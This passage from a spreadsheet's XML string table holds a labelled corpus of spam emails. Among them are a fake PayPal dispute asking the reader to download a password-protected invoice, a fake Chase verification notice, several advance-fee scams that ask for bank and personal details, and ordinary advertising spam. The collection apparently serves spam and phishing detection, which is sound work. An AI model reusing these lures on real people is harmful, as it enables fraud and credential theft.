    <t>To: jose@monkey.org\nFrom: "new" &lt;dispute@paypal.com&gt;\nDate: Tue, 16 Apr 2019 04:25:07 +0300</t>
  </si>
  <si>
    <t>Tue, 16 Apr 2019 04:25:07 +0300</t>
  </si>
  <si>
    <t>"new" &lt;dispute@paypal.com&gt;</t>
  </si>
  <si>
    <t>=?UTF-8?B?UGF5UGFsIGNhc2XCoGlkIG5lZWQgeW91ciBhY3Rpb24g?=</t>
  </si>
  <si>
    <t>please download invoice and make sure you agree with the charges\n\nfor more protection the key is : 123456789 to open the pdf file\n\nIssues with this transaction?\nYou have 180 days from the date of the transaction to open a dispute in the\nResolution Center.\n\nQuestions? Go to the Help Center at [URL]www.paypal.com[/URL]\n\nPlease do not reply to this email. This mailbox is not monitored and you\nwill not receive a response. For assistance, log in to your PayPal account\nand click Help in the top right corner of any PayPal page or please contact\nus toll at 1-888-221-1161.\nYou can receive plain text emails instead of HTML emails. To change your\nNotifications preferences, log in to your account, go to your Profile, and\nclick My settings.\n\n\nCopyright © 1999-2019 PayPal, Inc. All rights reserved. PayPal is located\nat 2211 N. First St., San Jose, CA 95131.\nPayPal PPX001066:1.1:faee72d644071\n</t>
  </si>
  <si>
    <t>166</t>
  </si>
  <si>
    <t>To: Recipients &lt;noreply@chase.net&gt;\nFrom: "CHASE ONLINE" &lt;noreply@chase.net&gt;\nDate: Tue, 15 Mar 2016 04:45:34 -0400</t>
  </si>
  <si>
    <t>Tue, 15 Mar 2016 04:45:34 -0400</t>
  </si>
  <si>
    <t>"CHASE ONLINE" &lt;noreply@chase.net&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;noreply@chase.net&gt;</t>
  </si>
  <si>
    <t>CHASE ONLINE</t>
  </si>
  <si>
    <t>.                	     	  	             	      Dear Coustomer We need to confirm that you or someone authorized to use your account made the  following transaction(s) on your account :  Upgrade Account  Your online account will be fully restored once the verification process is completed. Thank you for being a valued customer. Customer Service Center. JPMorgan Chase &amp; Co ©2015     	                     E-mail Security Information         E-mail intended for your account ending in: 6459. If you are concerned about the authenticity of this message, please click here or call the phone number on the back of your credit card. If you would like to learn more about e-mail security or want to report a suspicious e-mail, click here  Note: If you are concerned about clicking links in this e-mail, the Chase Online services mentioned above can be accessed by typing [URL]www.chase.com[/URL] directly into your browser.        ABOUT THIS MESSAGE: This service message was delivered to you as a Chase Credit Card customer to provide you with account updates and information about your card benefits.  If you want to contact Chase, please do not reply to this message, but instead go to [URL]www.chase.com[/URL] . For faster service, please enroll or log in to your account. Replies to this message will not be read or responded to.  Your personal information is protected by state-of-the-art technology. For more detailed security information, view our Online Privacy Policy. To request in writing: Chase Privacy Operations, P.O. Box 659752, San Antonio, TX 78265-9752  ® 2015 JPMorgan Chase &amp; Co. New Page 2 .     Dear CoustomerWe need to confirm that you or someone authorized to use your account made the following transaction(s) on your account : Upgrade Account Your online account will be fully restored once the verification process is completed.Thank you for being a valued customer.Customer Service Center.JPMorgan Chase &amp; Co ©2015     E-mail Security Information E-mail intended for your account ending in: 6459.If you are concerned about the authenticity of this message, please click here or call the phone number on the back of your credit card. If you would like to learn more about e-mail security or want to report a suspicious e-mail, click here Note: If you are concerned about clicking links in this e-mail, the Chase Online services mentioned above can be accessed by typing [URL]www.chase.com[/URL] directly into your browser.  ABOUT THIS MESSAGE:This service message was delivered to you as a Chase Credit Card customer to provide you with account updates and information about your card benefits. If you want to contact Chase, please do not reply to this message, but instead go to [URL]www.chase.com[/URL] . For faster service, please enroll or log in to your account. Replies to this message will not be read or responded to. Your personal information is protected by state-of-the-art technology. For more detailed security information, view our Online Privacy Policy. To request in writing: Chase Privacy Operations, P.O. Box 659752, San Antonio, TX 78265-9752 ® 2015 JPMorgan Chase &amp; Co.</t>
  </si>
  <si>
    <t>www.chase.com www.chase.com www.chase.com www.chase.com</t>
  </si>
  <si>
    <t>1188</t>
  </si>
  <si>
    <t>To: nan\nFrom: olsom83 &lt;olsom83@netscape.net&gt;\nDate: Tue, 15 Mar 2005 18:52:14 +0300</t>
  </si>
  <si>
    <t>Tue, 15 Mar 2005 18:52:14 +0300</t>
  </si>
  <si>
    <t>olsom83 &lt;olsom83@netscape.net&gt;</t>
  </si>
  <si>
    <t>YUKOS OIL</t>
  </si>
  <si>
    <t>http://www.opendemocracy.net http://newsfromrussia.com http://mba-club.org</t>
  </si>
  <si>
    <t>1189</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Mr, Ahmed.Gueye &lt;seedy_guei9@hotmail.com&gt;\nDate: Tue, 15 Mar 2005 15:15:09 +0000</t>
  </si>
  <si>
    <t>Tue, 15 Mar 2005 15:15:09 +0000</t>
  </si>
  <si>
    <t>Mr, Ahmed.Gueye &lt;seedy_guei9@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Reminder</t>
  </si>
  <si>
    <t>DEAR,\nI KNOW THIS LETTER MIGHT COME AS A SURPRISE TO YOU. PLEASE\nACCEPT MY APOLOGY FOR ANY INCONVINIENCES THIS MAIL MAY CAUSE YOU .I FEEL THAT EMAIL CONTACT IS MORE SECURED AND PRIVATE WITH RESPECT TO MY INTENTION.\nI GOT YOUR CONTACT THROUGH THE DATA CENTRE OF THE CHAMBER OF COMMERCE IN DAKAR, SENEGAL.HOWEVER,I AM DR. JOSEPH TENN,THE PERSONAL PHYSICIAN TO CHARLES TAYLOR WHO WAS THE FORMER LIBERIAN PRESIDENT. MR TAYLOR WAS FORCED TO LEAVE THE COUNTRY AND SOME OF US ( HIS AIDES ) HAD TO LEAVE ALSO FOR OUR OWN LIVES AND FOR SECURITY REASONS.\nI AM CONFIDING IN YOU HOPING THAT YOU WILL NEVER BETRAY ME AT LAST.MY MOST URGENT CONCERN RIGHT NOW IS FOR YOU TO RECOGNIZE ME AS A FRIEND WHILE ESTABLISHING A LONG LASTING RELATIONSHIP.\nPRESENTLY,I AM IN DAKAR-SENEGAL WITH THE SUM OF ONE MILLION EIGHT HUNDRED THOUSAND U.S DOLLARS(USD$1,800.000.00M). THE MONEY WAS KEPT UNDER MY CARE WHEN I WAS INCHARGE OF THE PRESIDENTIAL ANNEX CLINIC FOR INTERNAL MEDICAL PURCHASES AND OTHER MANAGEMENT / ADMINISTRATIVE INCIDENTALS. IT WAS THE SITUATION OF WAR AND ALSO,THE FORCEFUL REMOVAL OF CHARLES TAYLOR'S REGIME THAT MADE ME TO MOVE AWAY WITH  THE FUND.\nTHE REASON FOR MY CONTACTING YOU IS OF THE NEWS I HEARD IN THE CNN JUST FEW DAYS AGO IN REGARDS TO MY FORMER BOSS MR.CHARLES TAYLOR.THE REPORT HAS IT THAT ANOTHER ALLEGATION IS BEING BROUGHT AGAINST HIM FOR TRYING TO LOOT OUT MORE MONEY FROM OUR HOME COUNTRY LIBERIA TO HIS BASE OF EXILE IN NIGERIA,A NEIGHBOURING WEST AFRICAN COUNTRY,AND WHENEVER ANY ALLEGATION OF SUCH IS BEING MADE AGAINST HIM, ALL EYES WILL NOT BE FOR HIM ALONE, BUT ALSO ON US THE FORMER LEUTENANTS.THE SAME NEWS ALSO APPEARED IN THE BBC NEWS WEBSITE AND YOU CAN CHECK OUT THE NEWS IN THE BBC WEBSITE TO CONFIRM MY FEARS AS I NEED TO TAKE PROPER PRECAUTIONS.\n[URL]http://news.bbc.co.uk[/URL]\nPLEASE,I WANT TO TRANSFER THE FUND INTO YOUR ACCOUNT FOR YOU TO SECURE IT FOR ME,PENDING WHEN I WILL COME AND MEET WITH YOU,AND TO HELP ME GET A GOOD PROFITABLE BUSINESS.NOTE THAT SUBSTANTIAL PORTION OF THIS MONEY WOULD BE COMPENSATED TO YOU FOR YOUR ASSISTANCE,PLEASE DO NOT HESITATE TO CONTACT ME SO THAT I WILL KNOW WHAT  NEXT.\nPLEASE KEEP THIS  INFORMATION VERY SECRET AND CONFIDENTIAL AS YOU CAN UNDERSTAND MY PRESENT PREDICAMENT AS A REFUGEE.\nPRESENTLY, \nTHANKS FOR YOUR CO-OPERATION.\nSINCERELY YOURS Mr,Ahmed .Gueye\nmy email contact: ahmeddy01@yahoo.com.au\n\n\n\n\n</t>
  </si>
  <si>
    <t>1187</t>
  </si>
  <si>
    <t>To: nan\nFrom: genanthony2000 &lt;genanthony2000@mail2lawyer.com&gt;\nDate: Tue, 15 Mar 2005 13:52:15 +0100</t>
  </si>
  <si>
    <t>Tue, 15 Mar 2005 13:52:15 +0100</t>
  </si>
  <si>
    <t>genanthony2000 &lt;genanthony2000@mail2lawyer.com&gt;</t>
  </si>
  <si>
    <t>FROM ANTHONY.</t>
  </si>
  <si>
    <t>\nDear friend,\n\nI wish the best in life for you and your family, and I hope\nyou will receive this mail in good spirit and respond\nquickly with ultmost secrecy and confidentiality,I got your\naddress through my professional relationship in discharging\nof my duties\nfor my government.\n\nMy name is Gen. Anthony Johnson. and I was the chief of\nsecurity and operations for former president Charles Taylor\nof Liberia.Please protect this mail for the safety of my\nlife and that of my family to avoid us being tortured or\nkilled by his left behind secret\nagents.\n\nPlease I humbly beg you from the bottom of my heart to\nlisten very carefully,the situation in my country is very\ncritical and chaos, uproar and hostilities had brought the\ncountry to its knees and from intelligent report the center\ncannot hold anymore for former\npresident Charles Taylor and his government.\n\nThe intense pressure from united states, united nations,\ninternational community and west African peace keeping\nto[Ecomog] had made him former president\nCharles Taylor to step aside and gone on exile and also\npressure to face war crime charges against humanity.\n\nListen very carefully, you know my country Liberia is very\nrich with diamonds,and with my position as former chief of\nsecurity and operations I have accumulated so much diamonds\nwhich I had sold to generate close to $30 Million over the\nyears and it is this fund that I want to move to you for\nsafe keeping.\n\nThe fund are in boxes in dollar denomination and it would\nbe sent to you through diplomatic courier service with your\nname as the beneficiary within few\ndays. Please would you do me a favour to receive this fund\nfor me? Else the government in power will seize the fund\nand plunder it. If you are capable and know that\nyou will truly and honestly help me, write me now, time is\nno more on my side.\n\nI will give you 30% of the fund and I will come to your\ncountry to take my part. Extend a friendly hand and help\nme. Please bear in mind that this fund is not a loaned or\nstolen money but rather a hard earned money generated.\n\nIf you are willing to help me in this transaction,please\nfurnish me with the followings:\n\n(1)  Your telephone number, Fax number (Mobile phoneif any)\n\n(2)  Your postal address\n\n(3)  Your full name and a little pre-amble about yourself -\nI mean your age, Marrital status, What you are doing for a\nliving e.t.c\n\nplease reply back via my private email address for your\ngood interest:- genanthony2000@mail2lawyer.com,\n\nYours Sincerely,\nGen.Anthony Johnson.\n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site\n- [URL]http://yoursite.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>2706</t>
  </si>
  <si>
    <t>To: vikkimeade005@hotmail.com\nFrom: vikki meade &lt;vikkimeade005@hotmail.com&gt;\nDate: Tue, 14 Nov 2006 02:57:23 +0200</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2006 02:57:23 +0200</t>
  </si>
  <si>
    <t>vikki meade &lt;vikkimeade005@hotmail.com&gt;</t>
  </si>
  <si>
    <t>vikkimeade005@hotmail.com</t>
  </si>
  <si>
    <t>I LOOK FORWARD TO YOUR EARLIEST REPLY.</t>
  </si>
  <si>
    <t>&gt;From Mrs.Vikki Meade.\n120,Paul Kruger Street,\nBoksburg South,\nJohannesburg Province.\nRepublic of South Africa\n\nHello,\n\nRE: TRANSFER OF $ 29,000.000.00 USD\n(TWENTY NINE MILLION UNITED STATE DOLLAR)\n=========================================\n\nI am Mrs.Vikki Meade, the Auditor General of prime banks here South Africa, \nduring the course of our auditing, I discovered a floating fund in an \naccount opened in the bank in 1990 and since 1993 nobody has operated on \nthis account again. After going through some old files in the records I \ndiscovered that the owner of the account died without a [heir] hence the \nmoney is floating and if I do not remit this money out urgently it will \nbeforfeited for nothing.\n\nThe owner of this account is Mr. Howard Sweeney, a foreigner, a miner and an \nindustrialist.He made millions of dollars before he died misteriously .Since \n1993 no other person knows about this account or any thing concerning it. My \ninvestigation proved to me that the account has no other beneficiary and \nthat Mr.Howard Sweeney until his death was the manager Sweeney Coy.(pty). \nSA. We will start the first transfer with six million dollars \n[$6,000,000.00] upon successful transaction without any disappoint from your \nside, we shall re-apply for the payment of the remaining amount to your \naccount.\n\nThe amount involved is (USD 29M) Twenty Nine million United States Dollars \nonly. I want to first transfer$6,000.000 [Six million United States Dollar] \nfrom this money into a safe foreigners account abroad before the rest, but I \ndon't know any foreigner.\n\nI am revealing this to you with believein God that you will never let me \ndown in this business. Also send your private telephone number and fax \nnumber including the full details of the account to be used for the\ndeposit.\n\nI need your strong assurance that you will never let me down in this \nbusiness proposition.\nWith my influence and the position of a bank official whom is working in our \nfavour we can transfer this money to any foreigner's reliable account which \nyou can provide with assurance that this money will be intact pending our \nphysical arrival in your country for sharing.\n\nThe bank official will destroy all documents of transaction immediately we \nreceive this money leaving no trace to any place and to build confidence you \ncan come immediately to discuss with me face to face after which I will make \nthis remittance in your presence and three of us will fly to your country at \nleast two days ahead of the money going into the account.\n\nAt the conclusion of this business, you will be given 35% of the total \namount, 60% will be for me, while 5% will be for expenses both parties might \nhave incurred during the process of transferring.\n\nI look forward to your earliest response.\n\nBest Regards,\nMrs.Vikki Meade.\n\n_________________________________________________________________\nSee their smiles, hear their laughter with Windows Live Messenger! \n[URL]http://messenger.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://messenger.live.com</t>
  </si>
  <si>
    <t>4838</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: "CopyMyDVD.com" &lt;CopyMyDVDcom@permissionpass.com&gt;\nDate: Tue, 14 May 2002 19:38:16 -0400</t>
  </si>
  <si>
    <t>Tue, 14 May 2002 19:38:16 -0400</t>
  </si>
  <si>
    <t>"CopyMyDVD.com" &lt;CopyMyDVDcom@permissionpass.com&gt;</t>
  </si>
  <si>
    <t>Wow...what a program!</t>
  </si>
  <si>
    <t>--########## See below for your Exit Information. ============================================================================================================ Everything you need to copy DVD movies!  DVD Copy Plus contains:  Step by Step Interactive Instructions  All Software Tools Included On CD  30 Day Risk Free Trial Available  FREE Live Technical Support Available  No DVD Burner Required  NEW! - INSTANT DOWNLOAD  Cut and Paste this address into your browser now! [URL]http://results.reliatrack.com[/URL]  ============================================================================================================ Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself at [URL]http://www.permissionpass.com[/URL]  Thank you.. - CopyMyDVD.com --########## Content-Type: text/html Content-Transfer-Encoding: 7bit Content-Disposition: inline   See below for your Exit Information. copyDVD Everything  you need to copy DVD movies! DVD  Copy Plus contains: Step by Step  Interactive Instructions   All Software Tools Included On CD   30 Day Risk Free Trial Available  FREE Live Technical Support Available  No DVD Burner Required NEW!  - INSTANT DOWNLOAD "Thanks  for the useful and very easy to use DVDCOPY System... I couldn't have  done it without you." -  Jim Sanborn    Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself by clicking HERE.  Thank you. --##########--</t>
  </si>
  <si>
    <t>http://results.reliatrack.com http://www.permissionpass.com</t>
  </si>
  <si>
    <t>4837</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "Standard Life" &lt;sl@insurancemail.net&gt;\nDate: Tue, 14 May 2002 19:28:05 -0400</t>
  </si>
  <si>
    <t>Tue, 14 May 2002 19:28:05 -0400</t>
  </si>
  <si>
    <t>"Standard Life" &lt;sl@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Offer Your Clients 11.19%</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_4365A_01C1FB64.2F304B00 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Offer your clients 11.19%	    *Rake not included	 While getting 5.5% Comission and a bonus for yourself!	  	   _____    ? 11.19% First Year (5.9% first year rate PLUS 5% premium bonus) ? 5.5% Commission*, plus bonus (call for details) ? Full death benefit ? 10% free withdrawal after one year ? Great for 1035's and transfers   _____    Free "A Salute to America" CD for the first 100 callers!	  	  Call or e-mail   us today!  800-767-7749 ? or ? Please fill out the form below for more information	  Name:	  	 E-mail:	  	 Phone:	  	 City:	  	State:	  	 	  	  	 	   	        Visit us online at: [URL]www.StandardAgents.com[/URL]      *Commission reduces at older ages. For agent use only.	  We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_4365A_01C1FB64.2F304B00 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Offer Your Clients 11.19% =20     =20        =20            =20           =20              =20                  =20            =20           =20              • 11.19%=20             First Year (5.9% first year rate PLUS 5% premium bonus)             • 5.5% Commission*, plus bonus (call for = details)             • Full death benefit             • 10% free withdrawal after one year             • Great for 1035's and transfers =20              =20            =20             =20           Call=20             or e-mail = us today!             — or — =20                  =20                      =20                         Please=20                           fill out the form below for more = information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                           =20                              =20                                          Visit = us online=20             at: [URL]www.StandardAgents.com[/URL] =                            *Commission reduces at older ages. For = agent use only. =20     =20        We = don't want anyone=20         to receive our mailings who does not wish to. This is = professional communication=20         sent to insurance professionals. To be removed from this mailing = list,=20         DO NOT REPLY to this message. Instead, go here: =20         [URL]http://www.Insurancemail.net[/URL] Legal=20   Notice=20 ------=_NextPart_000_4365A_01C1FB64.2F304B00--</t>
  </si>
  <si>
    <t>www.StandardAgents.com http://www.Insurancemail.net www.StandardAgents.com http://www.Insurancemail.net</t>
  </si>
  <si>
    <t>4833</t>
  </si>
  <si>
    <t>To: yegcpobisv@six86.com\nFrom: mort239o@688.six86.com\nDate: Tue, 14 May 2002 08:34:16 -0400</t>
  </si>
  <si>
    <t>Tue, 14 May 2002 08:34:16 -0400</t>
  </si>
  <si>
    <t>mort239o@688.six86.com</t>
  </si>
  <si>
    <t>yegcpobisv@six86.com</t>
  </si>
  <si>
    <t>ADV: Low Cost Life Insurance -- FREE Quote pnmkf</t>
  </si>
  <si>
    <t>Low-Cost Term-Life Insurance!\nSAVE up to 70% or more on your term life insurance policy now.\n    \nMale age 40 - $250,000 - 10 year level term - as low as $11 per month.\n    \nCLICK HERE NOW For your FREE Quote!\n [URL]http://211.78.96.242[/URL]\n    \nIf you haven't taken the time to think about what you are paying for life insurance...now is the time!!!\n    \nWe offer the lowest rates available from nationally recognized carriers.\n    \nAct now and pay less!\nCLICK HERE \n [URL]http://211.78.96.242[/URL]\n    \n    \n    \n++++++++++++++++++++++++++++\nSimple Removal instructions:\nTo be removed from our in-house list simply visit\n[URL]http://211.78.96.242[/URL]\nEnter your email addresses to unsubscribe.</t>
  </si>
  <si>
    <t>http://211.78.96.242 http://211.78.96.242 http://211.78.96.242</t>
  </si>
  <si>
    <t>4831</t>
  </si>
  <si>
    <t>To: &lt;lefty@spl.at&gt;\nFrom: lefty@spl.at\nDate: Tue, 14 May 2002 03:40:03 -0600</t>
  </si>
  <si>
    <t>Tue, 14 May 2002 03:40:03 -0600</t>
  </si>
  <si>
    <t>lefty@spl.at</t>
  </si>
  <si>
    <t>&lt;lefty@spl.at&gt;</t>
  </si>
  <si>
    <t>If You Own A Cell Phone......Please Read..... 5214</t>
  </si>
  <si>
    <t>Unbelievable Prices On Cell Phones And Accessories:\n\n[URL]http://65.218.171.48[/URL]\n\nHands Free Ear Buds 1.99! \nPhone Holsters 1.98! \nPhone Cases 1.98! \nCar Chargers 1.98! \nFace Plates As Low As 2.98! \nLithium Ion Batteries As Low As 6.94! \n\n[URL]http://65.218.171.48[/URL]\n\nClick Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, \nSAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below \nWHOLESALE PRICES!\n \n[URL]http://65.218.171.48[/URL]\n\n***NEW*** Now Also: Accessories For PALM III, PALM VII, \nPALM IIIc, PALM V, PALM M100 &amp; M105, HANDSPRING VISOR, COMPAQ iPAQ*** \n\nCar Chargers 6.95! \nLeather Cases 13.98! \nUSB Chargers 11.98! \nHot Sync Cables11.98! \n\n[URL]http://65.218.171.48[/URL]\n\n***If You Need Assistance Please Call Us  (732) 751-1457***\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nTo be removed from future mailings please send your remove \nrequest to: 3425342r@eudoramail.com</t>
  </si>
  <si>
    <t>http://65.218.171.48 http://65.218.171.48 http://65.218.171.48 http://65.218.171.48</t>
  </si>
  <si>
    <t>4836</t>
  </si>
  <si>
    <t>To: &lt;parislumber@neto.com&gt;, &lt;jocelyn@netnovations.com&gt;, &lt;bibe@neto.com&gt;,\nFrom: abgon@au.ru\nDate: Tue, 14 May 2002 01:45:01 -1800</t>
  </si>
  <si>
    <t>Tue, 14 May 2002 01:45:01 -1800</t>
  </si>
  <si>
    <t>abgon@au.ru</t>
  </si>
  <si>
    <t>&lt;parislumber@neto.com&gt;, &lt;jocelyn@netnovations.com&gt;, &lt;bibe@neto.com&gt;,</t>
  </si>
  <si>
    <t>Poor Credit? Get a Mortgage NOW                     XK</t>
  </si>
  <si>
    <t>On the topic of\n\n\n\nIt is time to refinance!\n\nYour credit does not matter, we can approve anyone.\n\nNow is the time to let some of the top mortgage companies \nin the country compete for your business. \n\nIf you have good credit we will give you the most amazing \nrates available anywhere! \n\nIf you have poor credit, don't worry! We can still refinance \nyou with the most competitive rates in the industry!\n\n\nLet Us put Our Expertise to Work for You!\n[URL]http://agileconcepts.com[/URL]\n\nOr site 2\n[URL]http://61.129.81.99[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\nErase\n[URL]http://agileconcepts.com[/URL]</t>
  </si>
  <si>
    <t>http://agileconcepts.com http://61.129.81.99 http://agileconcepts.com</t>
  </si>
  <si>
    <t>1901</t>
  </si>
  <si>
    <t>To: nan\nFrom: forme3000@jumpy.it\nDate: Tue, 14 Mar 2006 17:52:33 +0000</t>
  </si>
  <si>
    <t>Tue, 14 Mar 2006 17:52:33 +0000</t>
  </si>
  <si>
    <t>forme3000@jumpy.it</t>
  </si>
  <si>
    <t>reply</t>
  </si>
  <si>
    <t>Happy day,\n\nI am mr Peter anika, a staff of the finance ministry\nin\nLiberia.\nPlease if you have contact\nin your country or a safe\naccommodation for a\ntotal sum of $5 million in\ncash,kindly reach me through my email address.\nYour progress response will enable me disclose the\nnature of the deal\nand my terms.\n  Note that, i would want you to maintain the spirit\nof\nhonesty,transparency\nand confidentiality in case we conclude to move\nahead.Reach me too on : pmails700@technisamail.co.za\n\nlooking forward to receiving your punctual response,\n Send also your contact phone number, for oral  disscussion.\nBest wishes,\nPeter anika\n\n\n\n________________________________________\nSfida subito i tuoi amici online! [URL]http://www.jumpy.mediaset.it[/URL]\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.jumpy.mediaset.it</t>
  </si>
  <si>
    <t>1900</t>
  </si>
  <si>
    <t>To: simmoncp@musc.edu\nFrom: emi alin &lt;emile_90003_alin@hotmail.com&gt;\nDate: Tue, 14 Mar 2006 15:21:46 +0100</t>
  </si>
  <si>
    <t>Tue, 14 Mar 2006 15:21:46 +0100</t>
  </si>
  <si>
    <t>emi alin &lt;emile_90003_alin@hotmail.com&gt;</t>
  </si>
  <si>
    <t>simmoncp@musc.edu</t>
  </si>
  <si>
    <t>MY DEAREST,\n\nI AM EMILE ALIN 24YRS OF AGE FEMALE FROM CUBA . A MOTHER OF A CHILD I AM\nCURRENTLY IN A HORRIBLY STITUATION .I AM WRITING YOU BASE ON YOUR HIGH LEVEL\nOF MATURITY AND BY VIRTUE OF YOUR POSITION TO SEEK FOR YOUR ASSISTANCES .IT\nIS ALL ABOUT MY LATE HUSBAND AND WHAT I HAVE GONE THROUGH AFTER THE DEATH OF\nMY LATE HUSBAND AND WHAT HIS RELATIVES DID TO ME. I AM MEANT WITH MY LAWYER\nAND HE ADVISE ME ON ISSUED THAT I WILL NEED YOUR ASSISTANCS. I WILL GIVE YOU\nFURTHER DETAILS ABOUT MY SELF AFTER I HAVE HEAR FROM YOU YOU CAN REACH ME\nWITH MY EMAIL ADDRESS ( emicuba22@hotmail.com) HOPE TO HEAR FROM YOU.\n\nREGARDS,\n\nEMILE\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>493</t>
  </si>
  <si>
    <t>To: &lt;jose@monkey.org&gt;\nFrom: =?utf-8?q?Spam_Mail_Summary?= &lt;APotts@besd.net&gt;\nDate: Tue, 14 Feb 2017 06:53:33 -0700</t>
  </si>
  <si>
    <t>Tue, 14 Feb 2017 06:53:33 -0700</t>
  </si>
  <si>
    <t>=?utf-8?q?Spam_Mail_Summary?= &lt;APotts@besd.net&gt;</t>
  </si>
  <si>
    <t>Spam Quarantine Notification</t>
  </si>
  <si>
    <t>Spam Quarantine Notification            Spam Quarantine Notification          The message(s) below have been blocked by your administrator as suspected spam. There are 1 new messages in your Email Quarantine since you received your last Spam Quarantine Notification. If the messages below are spam, you do not need to take any action.  Messages will be automatically removed from the quarantine after 14 day(s). To see all quarantined messages view your email quarantine. Quarantined Email             From                    Subject                    Date          Release Jessica Frehner &lt;Jessica.Frehner@be... [SPAM] RE: Admin Helpdesk Notification 13 Feb 2017 View All Quarantined Messages(1) Note: This message has been sent by a notification only system. Please do not replyIf the above links do not work, please copy and paste the following URL into a Web browser:      [URL]https://aironman.besd.net[/URL]</t>
  </si>
  <si>
    <t>https://aironman.besd.net</t>
  </si>
  <si>
    <t>1786</t>
  </si>
  <si>
    <t>To: nan\nFrom: james owusu &lt;j_owusu113@hotmail.com&gt;\nDate: Tue, 14 Feb 2006 18:02:00 +0000</t>
  </si>
  <si>
    <t>Tue, 14 Feb 2006 18:02:00 +0000</t>
  </si>
  <si>
    <t>james owusu &lt;j_owusu113@hotmail.com&gt;</t>
  </si>
  <si>
    <t>I await your response</t>
  </si>
  <si>
    <t>Dear Friend,\n\nMy name is Mr. James Owusu, the regional manager of International commercial \nBank (ICB) Kaneohe Branch Ghana.\n\nI am a Ghanaian married with two kids.\n\nI have packaged a financial transaction that will benefit both of us. As the \nregional manager of the bank, it�s my duty to send financial reports to my \nhead office in the capital city of Accra.\n\nOn the course of the last year 2005 end of the of the year�s report, I \ndiscovered that my branch in which I am the manager made Six Million Five \nHundred and Fifty Thousand US Dollars ($6,550.000.00) of which my head \nOffice is not aware of and will never be aware of. I have since then PLACED \nthis fund on a SUSPENCE ACCOUNT without a beneficiary.\n\nAs an officer of the bank, I cannot be directly connected to this money thus \nI am compelled to request for your assistance to receive this money into \nyour bank account.\n\nI intend to part with 30% of this fund to you while 70% shall be for me.\nI do need to assure you that there is practically no risk involved in this.  \nIt�s going to be a bank-to-bank transfer.\n\nAll I need from you is to stand as the original depositor of this fund.\nIf you accept this offer, I will appreciate your timely response.\n\nWith regards,\n\nMr.James Owusu\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1040</t>
  </si>
  <si>
    <t>To: kencolubanjr@yahoo.com\nFrom: kenny coluban &lt;kencolubanjr@yahoo.com.au&gt;\nDate: Tue, 14 Dec 2004 08:23:38 +1100</t>
  </si>
  <si>
    <t>Tue, 14 Dec 2004 08:23:38 +1100</t>
  </si>
  <si>
    <t>kenny coluban &lt;kencolubanjr@yahoo.com.au&gt;</t>
  </si>
  <si>
    <t>kencolubanjr@yahoo.com</t>
  </si>
  <si>
    <t>LOOKING FORWARD YOUR RESPOND.</t>
  </si>
  <si>
    <t>MR KENNY COLUBAN,\nNO,542 YOFF RUE,\nDAKAR-SENEGAL,\nTEL.00221 1692 7750,\nFAX.00221 1864 2389 ,\nE-MAIL.kencolubanjr@yahoo.com.(or)zam_zam20002000@yahoo.com\n\n        INVESTMENT ASSISTANCE AND PARTNERSHIP.\n-------------------------------------------------------\n\nDear Sir/MAdam.\n\n\nI wish to introduce myself to you. I am Mr.KENNY\nCOLUBAN. the managing Director (LIZNETINVESTMENT ),And\nalso the son of Chief.WILLIAMS COLUBAN. from IVORY\nCOAST,ABIJAN,in west africa ,So my father instruct me\nto look for an foreign pertner who is going to be\ntrustworthy and God infearing who will able to help us\nin investment assistance in his/her company or if it\nis not ok for your company,you just look for stuitable\nbusiness in your country ,And i got you contact while\ni was searching at the net ,i came across it your mail\naddress i decided to mail you , and i will be well\npleade for your assistance and now we are in senegal\n-Dakar doing business in Dakar ,so we deceided to move\nover to europe for a investment .\n\nAnd my father map out about 5,000,000USD ( five\nmillion usD) for a investment in any european,And in\nwest africa we have about three branch office,The\nGambia,Abijan ivory coast and Senegal-Dakar.\n\nAnd another things we want you to do ,if you will able\nto assist us,And what we want from you is to just open\nan acount were the money for the investment ,you will\nsend me letter of invitation to come over for the\ninvestment,And why we want to move to european for an\ninvestment is because of political reason in Africa.\n\nAt the conclusion of this business you will be given\n25% of the total amount while 60% will be for me and\nmy family while 5% will be for expenses both parties\nmay incure in the course of making this transaction\nsuccesful. \n\nHowever, if you are not disposed to assist kindly\ndestroy the letter in view of the families interest\nand personal security. I count on you greatly for your\nassistance.Please,if where i contacted you is not okay\nwith you,do not hestiate to tell me and provide\nanother address where i will be contacting you.A good\npercentage awaits you for your assistance.\n\nExpecting to hear from you soon.\n\n      Yours  Faithfully,\n\n       MR.KENNEY COLUBAN JR.\n\n\n\n\n\n\n\n\n\n\n		\n__________________________________ \nDo you Yahoo!? \nYahoo! Mail - Easier than ever with enhanced search. Learn more.\n[URL]http://info.mail.yahoo.com[/URL]\n\n\n</t>
  </si>
  <si>
